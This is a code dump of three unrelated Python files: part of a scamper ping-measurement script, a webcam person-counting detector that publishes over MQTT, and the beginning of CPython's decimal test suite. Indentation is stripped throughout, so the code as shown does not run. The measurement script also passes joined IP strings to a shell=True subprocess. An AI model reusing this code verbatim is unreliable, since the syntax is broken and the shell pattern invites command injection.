# print('Scamper results:\n' + str(results))
if not connected:
try:
dns_socket_send = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dns_socket_send.connect((DNS_HOST, DNS_PORT_SEND))
connected = True
# print('send_measurements: connected')
except socket.error as e:
pass
else:
break
# Executes a command as a subprocess.
def execute_command(command):
#import subprocess
return subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
# Gives the result from the scamper pings to the given list of IPs.
def scamper(ip_list):
comm = '/usr/local/bin/scamper -c "ping -c 1" -p 1 -i ' + ' '.join(ip_list)
results = execute_command(comm)
return data_from_results(results)
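# For ip_list = ['10.0.0.1', '10.0.0.2'] (illustrative), the assembled command
# is: /usr/local/bin/scamper -c "ping -c 1" -p 1 -i 10.0.0.1 10.0.0.2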
# Parses the scamper results and fetches the data.
def data_from_results(results):
results = results.split('\n')
data = ''
length = len(results)
i = 0
packets_delivered = None
while i < length:
if results[i].startswith('--- '):
data += results[i].split()[1] + ' '
packets_delivered = results[i+1].split()[3]
if packets_delivered == '0':
                data += 'inf\n'
i += 2
elif packets_delivered == '1':
data += results[i+2].split(' = ')[1].split('/')[0] + '\n'
i += 3
else:
i += 1
return data
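# The parser above assumes per-target scamper blocks of roughly this shape
# (illustrative output, not captured from a real run):
#   --- 10.0.0.1 ping statistics ---
#   1 packets transmitted, 1 packets received, 0.0% packet loss
#   round-trip min/avg/max/stddev = 12.3/12.3/12.3/0.000 ms
# which yields the line '10.0.0.1 12.3\n' ('10.0.0.1 inf\n' on packet loss).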
# Beginning of execution.
def main():
port = int(sys.argv[1])
global DNS_PORT_SEND, DNS_PORT_RECV
if port > 40000:
if port > 50000:
if port > 60000:
if port > 2**16:
pass
else:
#60k - 2**16
DNS_PORT_SEND = port - 15328
DNS_PORT_RECV = port - 15329
else:
#50k - 60k
DNS_PORT_SEND = port - 10528
DNS_PORT_RECV = port - 10529
else:
#40k-50k
DNS_PORT_SEND = port + 15329
DNS_PORT_RECV = port + 15328
else:
#< 40k
pass
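    # e.g. port 45000 maps to DNS_PORT_SEND 60329 / DNS_PORT_RECV 60328, and
    # port 55000 maps to 44472 / 44471 (illustrative inputs).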
# print('dps:' + str(DNS_PORT_SEND))
# print('1:' + str(DNS_PORT_SEND))
# print('2:' + str(DNS_PORT_RECV))
active_measurements()
if __name__ == '__main__':
main()
|
people_detector.py
|
######## Webcam Object Detection Using Tensorflow-trained Classifier #########
#
# Author: Evan Juras
# Date: 10/27/19
# Description:
# This program uses a TensorFlow Lite model to perform object detection on a live webcam
# feed. It draws boxes and scores around the objects of interest in each frame from the
# webcam. To improve FPS, the webcam object runs in a separate thread from the main program.
# This script will work with either a Picamera or regular USB webcam.
#
# This code is based off the TensorFlow Lite image classification example at:
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py
#
# I added my own method of drawing boxes and labels using OpenCV.
# Import packages
import os
import argparse
import cv2
import numpy as np
import sys
import time
from threading import Thread
import importlib.util
from utils.data_tracker import *
from utils.mqtt_client import *
# Define VideoStream class to handle streaming of video from webcam in separate processing thread
# Source - Adrian Rosebrock, PyImageSearch: https://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
class VideoStream:
"""Camera object that controls video streaming from the Picamera"""
def __init__(self,resolution=(640,480),framerate=30):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
        ret = self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, resolution[0])
        ret = self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, resolution[1])
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
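# Minimal usage sketch of VideoStream (mirrors how it is used further below;
# the resolution is illustrative):
#   vs = VideoStream(resolution=(640,480), framerate=30).start()
#   frame = vs.read()
#   vs.stop()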
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument('--modeldir', help='Folder the .tflite file is located in',
required=True)
parser.add_argument('--graph', help='Name of the .tflite file, if different than detect.tflite',
default='detect.tflite')
parser.add_argument('--labels', help='Name of the labelmap file, if different than labelmap.txt',
default='labelmap.txt')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
parser.add_argument('--resolution', help='Desired webcam resolution in WxH. If the webcam does not support the resolution entered, errors may occur.',
default='1280x720')
parser.add_argument('--edgetpu', help='Use Coral Edge TPU Accelerator to speed up detection',
action='store_true')
parser.add_argument('--record', help='Use a VideoWriter to record and save the output',
action='store_true') ### ADD RECORD ARGUMENT - JACOB HAGAN
parser.add_argument('--showdisplay', help='Displays output with cv2',
action='store_true') ### ADD DISPLAY ARGUMENT - JACOB HAGAN
parser.add_argument('--broker-ip', help='IP Address of the MQTT Broker. If no IP is specified, MQTT will not be used.',
default=None) ###ADDED BY COREY CLINE
parser.add_argument('--client_name', help='Name of the MQTT Client Session. Default session is TX1.',
default='TX1') ###ADDED BY COREY CLINE
parser.add_argument('--topic', help='MQTT topic to publish data to. Default topic is test/occupancy.',
default='test/occupancy')
parser.add_argument('--publish-interval', help='Interval in seconds to publish to MQTT topic. Default interval is 10s.',
default=10) ###ADDED BY COREY CLINE
args = parser.parse_args()
MODEL_NAME = args.modeldir
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
resW, resH = args.resolution.split('x')
imW, imH = int(resW), int(resH)
use_TPU = args.edgetpu
use_VideoWriter = args.record ### INITIALIZE VIDEOWRITER FLAG - JACOB HAGAN
showdisplay = args.showdisplay ### INITIALIZE DISPLAY FLAG - JACOB HAGAN
broker_ip = args.broker_ip ###ADDED BY COREY CLINE
client_name = args.client_name ###ADDED BY COREY CLINE
mqtt_topic = args.topic ###ADDED BY COREY CLINE
publish_interval = int(args.publish_interval) ###ADDED BY COREY CLINE
# Validate MQTT input arguments here - COREY CLINE
if broker_ip is None:
if mqtt_topic != "test/occupancy":
raise Exception( "Must specify a broker_ip to publish to a topic. " + \
"Use --broker-ip argument to connect to a broker." )
if client_name != "TX1":
raise Exception( "Must specify a broker_ip for a client_name. "+ \
"Use --broker-ip argument to connect to a broker." )
if publish_interval != 10:
raise Exception( "Must specify a broker_ip to publish at a given " + \
"interval. Use --broker-ip argument to connect " + \
"to a broker." )
# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
if pkg:
from tflite_runtime.interpreter import Interpreter
if use_TPU:
from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
if use_TPU:
from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
if (GRAPH_NAME == 'detect.tflite'):
GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
    del labels[0]
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print(PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW,imH),framerate=30).start()
time.sleep(1)
# If the user wants to record the output, initialize the VideoWriter object - JACOB HAGAN
if use_VideoWriter:
writer = cv2.VideoWriter( "output/output.avi", cv2.VideoWriter_fourcc( *"MJPG" ), 4, (imW,imH) ) ### ADDED HERE TO SAVE VIDEO AS FILE - COREY CLINE
# Initialize data tracker and MQTT Client - ADDED BY COREY CLINE
if broker_ip:
pub_timer = time.perf_counter() ### INITIALIZE PUBLISH TIMER - ADDED BY COREY CLINE
tracker = DataTracker()
TX1_client = MQTTClient( broker_ip, client_name )
TX1_client.connect()
#for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
while True:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame = cv2.flip( frame, -1 ) ### ADDED HERE TO FLIP IMAGE FROM VIDEO STREAM - COREY CLINE
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
# Retrieve detection results
boxes = interpreter.get_tensor(output_details[0]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[1]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[2]['index'])[0] # Confidence of detected objects
#num = interpreter.get_tensor(output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
# Track number of occupants - ADDED BY COREY CLINE
num_occupants = 0
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)
# Draw label
object_name = labels[int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i]*100)) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text
# Count for People - ADDED BY COREY CLINE
if ( object_name == "person" ):
num_occupants += 1
# Draw framerate in corner of frame (Draw occupant number in corner of frame ADDED BY COREY CLINE)
cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
cv2.putText(frame, 'PEOPLE: {}'.format(num_occupants),(30,90),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
if not showdisplay: ### IF DISPLAY FLAG IS NOT TRUE, PRINT DETECTION OUTPUT TO CONSOLE - JACOB HAGAN
print( "FPS: {0:.2f}".format(frame_rate_calc) + "\tPEOPLE: {}".format(num_occupants)) ### PRINT RESULTS TO CONSOLE - ADDED BY COREY CLINE
# All the results have been drawn on the frame, so it's time to display it.
if use_VideoWriter:
writer.write( frame ) ### ADDED HERE TO WRITE THE CURRENT FRAME TO THE VIDEO FILE - COREY CLINE
if showdisplay:
cv2.imshow('Object detector', frame)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
# Check for a broker connection before publishing - COREY CLINE
if broker_ip:
time_passed = time.perf_counter() - pub_timer ### ADDED BY COREY CLINE
# Add data point to tracker - ADDED BY COREY CLINE
tracker.add_point( num_occupants )
# Check mqtt publish timer - ADDED BY COREY CLINE
        if time_passed > publish_interval:
mode = tracker.get_mode()
tracker.clear_data()
TX1_client.client.loop_start()
TX1_client.publish( mqtt_topic, mode, qos = 2, retain = False )
TX1_client.client.loop_stop()
print( "PEOPLE: {}".format( mode ) )
pub_timer = time.perf_counter()
# Press 'q' to quit
if cv2.waitKey(1) == ord('q'):
break
# Clean up
cv2.destroyAllWindows()
videostream.stop()
if use_VideoWriter:
writer.release() ### ADDED HERE TO RELEASE THE VIDEO WRITER AND SAVE THE FILE - COREY CLINE
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former tests
the Decimal arithmetic using the tests provided by Mike Cowlishaw, while the
latter tests the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from the command line with one parameter
(Arithmetic or Behaviour) to test each part, or without a parameter to test
both parts. If you're working in IDLE, you can import this test module and
call test_main() with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (check_warnings, import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import time
import inspect
try:
import threading
except ImportError:
threading = None
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure errors are actually raised when trapped, rather than only being
# recorded in the flags. Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = hasattr(C, 'DecClamped')
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
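    # e.g. eval_line trims the (illustrative) test line
    # "addx001 add 1 1 -> 2 -- a comment" down to "addx001 add 1 1 -> 2"
    # before dispatching it to eval_equation.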
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
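    # e.g. the directive "precision: 9" calls change_precision(9), and
    # "rounding: half_even" switches the context to ROUND_HALF_EVEN
    # (illustrative directives).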
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
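        # FixQuotes maps a doubled quote back to a literal one, e.g. the
        # (illustrative) token "'1''2'" becomes "1'2".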
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
